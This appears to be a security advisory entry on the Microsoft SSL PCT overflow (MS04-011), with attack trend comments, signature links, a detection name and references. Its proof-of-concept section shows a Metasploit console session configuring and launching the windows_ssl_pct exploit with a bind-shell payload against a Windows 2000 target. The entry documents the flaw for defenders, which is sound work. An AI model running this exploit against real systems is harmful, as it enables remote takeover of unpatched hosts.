■Comments

An increase in attacks exploiting this vulnerability was detected on April 30, 2004.

http://www.cyberpolice.go.jp/important/2004/20040430_084140.html


■Signature description

http://www.iss.net/security_center/static/12380.php

http://www.isskk.co.jp/support/techinfo/general/MS_SSL_168.html


■Proof-of-concept code

・Code: Widely available to the public.


msf windows_ssl_pct(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit:    Name      Default            Description
--------    ------    ---------------    -------------------------------------
required    RHOST     192.168.221.180    The target address
required    RPORT     443                The target port
optional    PROTO     raw                The application protocol (raw or smt)

Payload:    Name        Default    Description
--------    --------    -------    ------------------------------------------
required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
required    LPORT       4444       Listening port for bind shell

Target: Windows 2000 SP0

msf windows_ssl_pct(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP0
[*] Sending 376 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.


■Detection with Proventia

SSL_PCT1_Overflow


■References

Microsoft Security Bulletin MS04-011
Security Update for Microsoft Windows (835732)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Internet Security Systems Security Advisory, April 13, 2004
Microsoft SSL Library Remote Compromise Vulnerability
http://xforce.iss.net/xforce/alerts/id/168

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows
http://www.ciac.org/ciac/bulletins/o-114.shtml

CERT Vulnerability Note VU#586540
Microsoft Private Communication Technology (PCT) fails to properly validate message inputs
http://www.kb.cert.org/vuls/id/586540

SecuriTeam Mailing List, Windows focus 22 Apr 2004
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
http://www.securiteam.com/windowsntfocus/5CP0L0KCKO.html

Internet Security Systems Security Alert, April 13, 2004
Multiple Vulnerabilities in Microsoft Products
http://xforce.iss.net/xforce/alerts/id/169

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows [REVISED 25 Jun 2004]
http://www.ciac.org/ciac/bulletins/o-114.shtml

CVE
CVE-2003-0719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719